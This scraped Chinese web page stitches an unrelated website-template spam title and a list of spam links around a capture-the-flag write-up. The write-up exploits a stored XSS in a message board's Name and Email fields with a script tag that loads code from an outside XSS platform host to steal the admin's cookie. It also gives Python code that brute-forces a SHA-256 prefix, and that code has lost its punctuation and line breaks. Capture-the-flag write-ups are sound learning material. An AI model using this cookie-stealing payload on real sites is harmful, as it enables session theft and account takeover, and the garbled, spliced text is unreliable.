当前位置: 首页 > news >正文

网站模版更新公告辽阳网站开发公司

网站模版更新公告,辽阳网站开发公司,宁波余姚网站建设,做注册任务网站源码知识 例子 。2022 CNSS夏令营 To_be_Admin_Again_and_Again XSS攻击. 与admin有关, 可以尝试http://1.117.6.207:65005/admin, 显示Get out, HACKER! Only admin can see the flag!, 说明需要一个admin的验证, 这里想到获取admin的cookie. 每条留言会自动查看, 可以使用XS…知识 例子 。2022 CNSS夏令营 To_be_Admin_Again_and_Again XSS攻击. 与admin有关, 可以尝试http://1.117.6.207:65005/admin, 显示Get out, HACKER! Only admin can see the flag!, 说明需要一个admin的验证, 这里想到获取admin的cookie. 每条留言会自动查看, 可以使用XSS攻击, 很容易看出来Name和Email两栏有XSS漏洞, 可以使用封闭input标签并插入一个script标签进行Cookie的获取. 这里我直接使用了一个XSS平台进行了payload构建, 可以自己搭服务器. payload: sCRiPt sRC//uj.ci/Qpae/sCrIpT 使用preview可以发现payload已被正常解析成了html语句, 后台也收到了cookie: 然后只需要暴力碰撞一下这个sha256即可发送至后台获取Admin的cookie. 碰撞代码的python源码: import hashlibdef sha256(s):return hashlib.sha256(s.encode(utf-8)).hexdigest()if __name__ __main__:def sha256Crack(token):for i in range(10000000000):# print(sha256(i))a sha256(f{i:04d})[:6] print(f\r{a}, end, flushTrue)if a token[:6]:print()return iprint()return Noneprint(sha256Crack(str(input())))拿到cookie就可以改cookie去/admin了, 直接打开就有flag辽
http://wiki.neutronadmin.com/news/262530/

相关文章:

  • 重庆企业官网建站快速搭建网上在线看视频为什么卡
  • 帮客户做网站挣钱吗wordpress新闻轮播制作
  • 福田官网网站哪家企业做网站
  • 旅游类网站策划建设_郑州做响应式网站
  • 推销网站建设具备哪些知识网站里网格怎么做
  • 国外ui界面设计网站衡阳seo优化
  • 电脑单页网站建设网站服务器租用价格一般多少钱?
  • 开发一个商城网站需要多少钱网站制作信息
  • 营销网站建设专业团队在线服务wordpress 柚子皮5.61
  • 网站建设行业市场规模天津建设厅官方网站
  • 网站综合查询工具事业单位网站后台建设方案
  • 黑科技引流推广神器下载做网站需要找人优化吗
  • 网站服务器不稳定如何做一名优秀的网站管理者
  • 做网站公司哪家公司vi企业视觉形象设计
  • 个人网站咋推广啥叫流量wordpress 中文数据
  • 高新门户网站专题建设外贸行业网站建设公司排名
  • 成都 html5网站国外案例网站
  • 中山企业网站建设方案网站建设哪个公司比较好
  • php商城网站建设js wordpress 菜单管理系统
  • 留学网站建设文案企业营销网络建设
  • 网页无法访问摄像头seo关键词优化平台
  • 乐清网站制作的公司百度小说风云榜排行榜官网
  • 如何建立属于自己的网站灌南网站定制
  • 有没有可以做兼职的网站太原市建设银行网站首页
  • flash网站制作高级搜索
  • 天津市网站制作公司好的作文网站
  • 怎么样建设一个电影网站视频谷歌浏览器下载
  • iphone网站郑州做互联网推广的
  • 网站开发市场调查昆明招聘网站建设普工小工
  • 天河商城网站建设百度关键词seo年度费用